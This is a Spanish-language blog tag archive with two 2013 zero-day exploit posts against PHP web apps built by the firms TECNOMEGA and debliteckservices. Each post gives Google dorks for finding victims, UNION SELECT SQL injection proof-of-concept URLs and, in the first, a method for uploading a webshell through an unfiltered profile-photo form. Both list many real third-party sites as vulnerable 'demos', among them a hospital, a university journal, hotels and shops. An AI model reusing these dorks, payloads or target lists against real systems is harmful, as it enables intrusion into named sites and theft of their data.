Archivo de la etiqueta: ZeroDay

TECNOMEGA / SQL Injection vulnerability & Shell Upload

# Exploit Title: TECNOMEGA / SQL Injection vulnerability & Shell Upload
# Date: 21/02/2013
# Exploit Author: Diego_Asencio || r4z0r_bl4ck
# Twitter: @r4z0r_bl4ck
# Blog: https://r4z0rbl4ck.wordpress.com/
# Vendor Homepage: http://www.tecnomega.net/
# Tested on: Linux Ubuntu
# Categoria: WebApps – PHP
# Google Dork: inurl:.php?id= intext:Desarrollado por TECNOMEGA || inurl:registrarme.php intext:Desarrolado por TECNOMEGA
# WorkGroup: @inside0utside

-= INFORMACION =-

La Empresa Digital TECNOMEGA desarrolla aplicaciones web en lenguaje PHP, en el cual no tienen en cuenta el filtrado de variables, ni el filtrado de extenciones de archivos en los ‘uploads’ o subidores de archivos, permitiendo a un atacante subir su phpshell por medio de un formulario de registro de usuario normal, o realizando la inyeccion de SQL para obtener los datos del usuario administrador

-= MYSQL ERROR =-

Error
SELECT * FROM productos WHERE marca=’1” AND estado=’1′ ORDER BY nombre ASC limit 0,16
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1’ ORDER BY nombre ASC limit 0,16′ at line 1

-= XPL (PoC) =-

1) => http://127.0.0.1/*.php?id=1+union+all+select+0,1,2,3,4– [SQL Injection]

2) => http://127.0.0.1/registrarme.php [Shell Upload]

-= DEMO’s =-

http://itouch.com.co/detalle-accesorio.php?id=362 (SQLi)
http://www.revistacolombianadesaludocupacional.co/autor-detalle.php?id=49 (SQLi)
http://tecnomega.net/productos-marcas.php?id=15 (SQLi)
http://www.unilibrecali.edu.co/Revista_Colombiana_Salud_Ocupacional/autor-detalle.php?id=42 (SQLi)
http://dkrinmobiliaria.com/detalle_inmueble.php?id=36 (SQLi)
http://megatec.com.co/noticias.php?id=9 (SQLi)
http://www.computiendaelectronica.com/detalle_producto.php?id=189 (SQLi)

=> Asi Mismo, para subir shell el dominio seria el mismo, pero con el directorio /registrarme.php donde en el campo para subir la foto de perfil, se colara la WebShell en el servidor por no filtrar extenciones en los formularios de uploads

#################################
Agradecimientos a:

@inside0utside – t34m /
– all members

@R4z0r_Bl4ck
@Sr_Xaoc
@MaximusWell
@MikeSoft
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

(0day) debliteckservices / SQL Injection vulnerability

0day

 

# Exploit Title: debliteckservices / SQL Injection vulnerability
# Date: 02/02/2013
# Exploit Author: Diego_Asencio || r4z0r_bl4ck
# Twitter: @r4z0r_bl4ck
# Blog: https://r4z0rbl4ck.wordpress.com/
# Vendor Homepage: http://www.debliteckservices.com/
# Tested on: Windows Ultimate – Linux Ubuntu
# Categoria: WebApps – PHP
# Google Dork: inurl:gallery.php?id= intext:Debliteck
# WorkGroup: @inside0utside

-= INFORMACION =-

La empresa debliteckservices dedicada al diseño y desarrollo web, dentro de su portafolio de trabajo contiene paginas web en lenguaje PHP con vulnerabilidad de SQL, la cual permite al atacante inyectar peticiones o consultas a la base de datos.

 

-= MYSQL ERROR’s =-

1) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ and state=’ACTIVE’ order by sort limit 0,12′ at line 1

2) Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/h/o/domain/public_html/include/function.php on line 97

3) Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/x/y/domain/public_html/header.php on line 82

4) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/n/o/domain/web/public_html/header.php on line 13

 
-= XPL (PoC) =-

http://127.0.0.1/gallery.php?id=1+union+all+select+0,1,2,3,4

http://127.0.0.1/section.php?id=1+union+all+select+0,1,2,3,4

http://127.0.0.1/article.php?id=1+union+all+select+0,1,2,3,4

 

-= DEMO’s =-

http://www.st-raphaelhospital.com/gallery.php?id=6 (SQLi)
http://www.coralsearesorts.eu/gallery.php?id=15 (SQLi)
http://www.nplanitis.com/gallery.php?id=8 (SQLi)
http://www.camel-park.com/gallery.php?id=2 (SQLi)
http://www.underseawalkers.com/gallery.php?id=1 (SQLi)
http://www.bellsinn.com/gallery.php?id=2 (SQLi)
http://www.olympicresidence.com/gallery.php?id=13 (SQLi)
http://www.kanika-ibc.com/gallery.php?id=2 (SQLi)
http://www.limocy.com/gallery.php?id=4 (SQLi)
http://www.demetriseliaproperties.com/gallery.php?id=3 (SQLi)
http://www.forcecars.com/gallery.php?id=1 (SQLi)
http://www.newfamagustahotel.com/gallery.php?id=6 (SQLi)

http://d-kombosdevelopers.com/gallery.php?id=7 (SQLi)
http://xylophagou.com/gallery.php?id=3 (SQLi)
http://www.easyriders.com.cy/gallery.php?id=3 (SQLi)
http://www.agf.com.cy/gallery.php?id=1 (SQLi)

http://www.nissi-beach.com/section.php?id=20 (SQLi)
http://www.hotelsayianapa.com/section.php?id=7 (SQLi)

http://www.nozomi.com.cy/article.php?id=45 (SQLi)

 

#################################
Agradecimientos a: @Sr_Xaoc

@inside0utside – t34m /
– all members

@r4z0r_bl4ck
@sr_xaoc
@MaximusWell
@MikeSoft
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-